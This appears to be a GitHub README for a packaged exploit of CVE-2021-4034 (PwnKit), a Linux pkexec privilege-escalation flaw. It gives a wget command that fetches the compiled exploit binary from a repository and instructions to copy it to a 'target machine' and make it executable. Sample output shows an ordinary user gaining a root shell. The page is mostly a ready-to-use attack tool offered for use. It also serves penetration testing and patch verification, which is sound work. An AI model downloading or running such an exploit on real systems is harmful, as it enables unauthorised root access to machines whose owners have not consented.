CVE-2021-4034

This is my own implementation of CVE-2021-4034, more commonly known as pwnkit. Unlike other automated exploits of CVE-2021-4034 this implementation does not download any additional payloads and is contained all within one easy to transfer file.

Download

wget https://github.com/1337Rin/CVE-2021-4034/raw/main/pwnkit

Usage

This exploit has no cli options but it does check if the system is vulnerable and has all the required external commands. To use it just transfer the compiled binary to a writable folder on the target machine and make it executable.

$ chmod +x pwnkit

Example 1

./pwnkit
[+] Testing to see if machine is vulnerable
[-] This machine is not vulnerable to pwnkit
[-] Exiting

Example 2

$ whoami
tester
$ ./pwnkit
[+] Testing to see if machine is vulnerable
[+] This machine is vulnerable is pwnkit
[+] Checking for required commands
[+] gcc exists
[+] echo exists
[+] mkdir exists
[+] cp exists
[+] attempting exploit
manual clean up required
# whoami
root

GitHub

View Github